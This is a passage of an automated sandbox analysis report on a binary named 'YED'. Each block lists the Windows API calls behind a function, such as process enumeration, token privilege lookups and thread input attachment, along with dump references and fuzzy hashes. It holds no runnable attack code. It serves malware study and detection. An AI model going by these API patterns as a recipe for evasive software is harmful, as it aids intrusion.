                                                                                                                                                • Opcode Fuzzy Hash: 11f46c37c1dcbb5f33ef24b981fdf31ea1d135b7128a542a051315c5e2b72667
                                                                                                                                                • Instruction Fuzzy Hash: 1741A938A19255DFCB01CF58DC98EA9B7F4FB4A304F1940A8E8149F261CB30A9A1CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetForegroundWindow.USER32 ref: 002A16EB
                                                                                                                                                  • Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
                                                                                                                                                  • Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
                                                                                                                                                  • Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65
                                                                                                                                                • GetCaretPos.USER32(?), ref: 002A16FF
                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 002A174C
                                                                                                                                                • GetForegroundWindow.USER32 ref: 002A1752
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                • Opcode ID: f165874ea595218e5dfd7026bc4e58ac26c116e037b5779c605eb4dedda78f45
                                                                                                                                                • Instruction ID: 28285bc3c313962d6fb64ba13e88fde92f73ed2b104d3fb7ef87effef2077fe9
                                                                                                                                                • Opcode Fuzzy Hash: f165874ea595218e5dfd7026bc4e58ac26c116e037b5779c605eb4dedda78f45
                                                                                                                                                • Instruction Fuzzy Hash: B0313E75D10249AFC704EFA9C8858EEB7F9EF59304B5080AAE415E7211EB319E55CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0027D501
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0027D50F
                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0027D52F
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0027D5DC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                • Opcode ID: 84794726a7c770d7eabdc098b7ab7a6c4111a67b03534495c1fd9cb336c74079
                                                                                                                                                • Instruction ID: abb2b818f8819aaf9d5fab4aae4e601b745bdeb950678d6c0ebf3b36626b2c99
                                                                                                                                                • Opcode Fuzzy Hash: 84794726a7c770d7eabdc098b7ab7a6c4111a67b03534495c1fd9cb336c74079
                                                                                                                                                • Instruction Fuzzy Hash: 4431D171118301AFD300EF54D895AAFBBF8EFA9344F50492DF589831A1EF719998CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,002ACB68), ref: 0027D2FB
                                                                                                                                                • GetLastError.KERNEL32 ref: 0027D30A
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0027D319
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002ACB68), ref: 0027D376
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2267087916-0
                                                                                                                                                • Opcode ID: 8d099880e283b327158b4dccfc09097ca7585f87dd563a95eee63a7e0c63e9f5
                                                                                                                                                • Instruction ID: ab55f4b4d60a8c440cd8977290dda313dd13baf543360b1e8b95bfde79b2cfbf
                                                                                                                                                • Opcode Fuzzy Hash: 8d099880e283b327158b4dccfc09097ca7585f87dd563a95eee63a7e0c63e9f5
                                                                                                                                                • Instruction Fuzzy Hash: 2A21A3705252029F8710DF24D8858AAB7F4EE56328F208A5DF89DC32A1DB31D956CF93
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00271014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027102A
                                                                                                                                                  • Part of subcall function 00271014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00271036
                                                                                                                                                  • Part of subcall function 00271014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271045
                                                                                                                                                  • Part of subcall function 00271014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027104C
                                                                                                                                                  • Part of subcall function 00271014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271062
                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002715BE
                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 002715E1
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00271617
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0027161E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1592001646-0
                                                                                                                                                • Opcode ID: 10854d19091dc087fb44e1e45f25313810e0ee53cb84a4b982c9c550b0d48e82
                                                                                                                                                • Instruction ID: 3f92785b570273f4b27568375161e2c308b2f26cf2800de2ba0b626c4ff76133
                                                                                                                                                • Opcode Fuzzy Hash: 10854d19091dc087fb44e1e45f25313810e0ee53cb84a4b982c9c550b0d48e82
                                                                                                                                                • Instruction Fuzzy Hash: 6221AF71E10109EFDF14DFA8C949BEEB7B8EF44344F188459E449AB241E730AA25DFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                • GetCursorPos.USER32(?), ref: 002A9001
                                                                                                                                                • TrackPopupMenuEx.USER32 ref: 002A9016
                                                                                                                                                • GetCursorPos.USER32(?), ref: 002A905E
                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00267711,?,?,?), ref: 002A9094
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                                • Opcode ID: d3ee9716c55e80ef1542155f98474c259592b67585ca08226c73e6068389c208
                                                                                                                                                • Instruction ID: 699a54e66c585fdf77d4781c8ca0e644b2f1055f06cd0fb73da3d85cbeda2103
                                                                                                                                                • Opcode Fuzzy Hash: d3ee9716c55e80ef1542155f98474c259592b67585ca08226c73e6068389c208
                                                                                                                                                • Instruction Fuzzy Hash: 1321A135610018FFDB258F95DC98EFA7BB9EF8A390F144065F9055B261CB3199A0DF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 002A280A
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A2824
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A2832
                                                                                                                                                • SetLayeredWindowAttributes.USER32 ref: 002A2840
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                • Opcode ID: 3323c84c6aca9742a27560757909fe299e61acad48a72bec4b72d256ba865e4f
                                                                                                                                                • Instruction ID: fec04a5019117d11558f0cdf24d295a07e1eb3be686916828c37eeab27d2efe4
                                                                                                                                                • Opcode Fuzzy Hash: 3323c84c6aca9742a27560757909fe299e61acad48a72bec4b72d256ba865e4f
                                                                                                                                                • Instruction Fuzzy Hash: 3721E231214111EFD7149B28CC44FAAB795AF46324F248158F4268B6E2CF75ED96CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 002A56BB
                                                                                                                                                • _wcslen.LIBCMT ref: 002A56CD
                                                                                                                                                • _wcslen.LIBCMT ref: 002A56D8
                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 002A5816
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 455545452-0
                                                                                                                                                • Opcode ID: 4fc499f5c34cdd3ec0c4a00078afdedee0ede52330867a895c557a5f3fb57df7
                                                                                                                                                • Instruction ID: 531c0d1e0e47fd6fc8ccfa1f019729eaa83fb984630af5a122be8ec346b4d9cb
                                                                                                                                                • Opcode Fuzzy Hash: 4fc499f5c34cdd3ec0c4a00078afdedee0ede52330867a895c557a5f3fb57df7
                                                                                                                                                • Instruction Fuzzy Hash: 0611B17163062AD7DB20DF619C85AEF77ACBF16760F104066F915D6081EFB09AA4CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029F279E
                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029F27B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                • Opcode ID: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
                                                                                                                                                • Instruction ID: ced12e47c3e75b6ff257e23d29169d4c6a1c68713413ef53e05e707fe5ee2233
                                                                                                                                                • Opcode Fuzzy Hash: 946f278fc3e31e727c81028ebb0495bff9378def4856718e2f28f762550e10d8
                                                                                                                                                • Instruction Fuzzy Hash: 80014233E493119EAAF127B5BCC4B672B99EB45778720023AFF24481F0EF1198028798
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateThread.KERNEL32(00000000,?,0023CFF9,00000000,00000004,00000000), ref: 0023D218
                                                                                                                                                • GetLastError.KERNEL32 ref: 0023D224
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0023D22B
                                                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 0023D249
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 173952441-0
                                                                                                                                                • Opcode ID: b7c530cc40451db1f43f1f93f3775c0470dbaf6145bcb84fcc57621928bec3e2
                                                                                                                                                • Instruction ID: 3545bb1817adb169f51037035a71b588a9f808ab59f7d56f4e9a13f5b342441c
                                                                                                                                                • Opcode Fuzzy Hash: b7c530cc40451db1f43f1f93f3775c0470dbaf6145bcb84fcc57621928bec3e2
                                                                                                                                                • Instruction Fuzzy Hash: D90126B2824204BBCB105FA5FC09BAB7A68DF82730F200219FC24921D1CF70C820CAA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0027E1FD
                                                                                                                                                • MessageBoxW.USER32 ref: 0027E230
                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0027E246
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0027E24D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                • Opcode ID: 190a7c2de8ee4b471ed528ed91b257ce6b2e4509ffcd48b4a39d16d75b2b87c9
                                                                                                                                                • Instruction ID: 17ea7e7469346c9a6d9fd8e8dc428a28e9c2290c9285dcd4027262857f03e136
                                                                                                                                                • Opcode Fuzzy Hash: 190a7c2de8ee4b471ed528ed91b257ce6b2e4509ffcd48b4a39d16d75b2b87c9
                                                                                                                                                • Instruction Fuzzy Hash: 45112B72A14254BBCB019FA8BC4DA9F7FAC9B46320F1182A5FC18D7295DAB0CD1087B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateWindowExW.USER32 ref: 0021604C
                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00216060
                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                                • Opcode ID: 685e88f92739e1f1e4121a96f3a2f6d3686b71bfead3d8b2893aa9bfd471d7c0
                                                                                                                                                • Instruction ID: 224e3ad8ad06bd4ab245b75aa59b63805986bee9a33935a3550100d7540d02ca
                                                                                                                                                • Opcode Fuzzy Hash: 685e88f92739e1f1e4121a96f3a2f6d3686b71bfead3d8b2893aa9bfd471d7c0
                                                                                                                                                • Instruction Fuzzy Hash: 7D116D72511549BFEF129FA49C48EEEBBADFF1D3A4F140215FA1452110DB329CA0DBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0027747F
                                                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00277497
                                                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002774AC
                                                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002774CA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1352324309-0
                                                                                                                                                • Opcode ID: e8e90c4f5622c1630e3c542c944f39924092706d12044a3dbdff9a4f064bdb12
                                                                                                                                                • Instruction ID: 750df4380a3ec1b5bedb82018cf75ec99638d1a66c35d3aac6d4fc4fe04efd4f
                                                                                                                                                • Opcode Fuzzy Hash: e8e90c4f5622c1630e3c542c944f39924092706d12044a3dbdff9a4f064bdb12
                                                                                                                                                • Instruction Fuzzy Hash: D911A1B52153119BF7208F24EC18F927FFCEB04B00F10C569A61AD6151DBB0E914DB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0C4
                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0E9
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B0F3
                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0027ACD3,?,00008000), ref: 0027B126
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                • Opcode ID: e6dd250862cbe06e7d074bd696c359946453dcdd4389e0d8429597e58fe12581
                                                                                                                                                • Instruction ID: 7757e93b4e5a3666749fac113ea7d748e62efd9399d0f2d88764ba23992776c4
                                                                                                                                                • Opcode Fuzzy Hash: e6dd250862cbe06e7d074bd696c359946453dcdd4389e0d8429597e58fe12581
                                                                                                                                                • Instruction Fuzzy Hash: A5118B30E2152DE7CF01AFE4E9687EEBB78FF0A311F108096D949B2181CB308661CB51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00272DC5
                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00272DD6
                                                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00272DDD
                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 00272DE4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
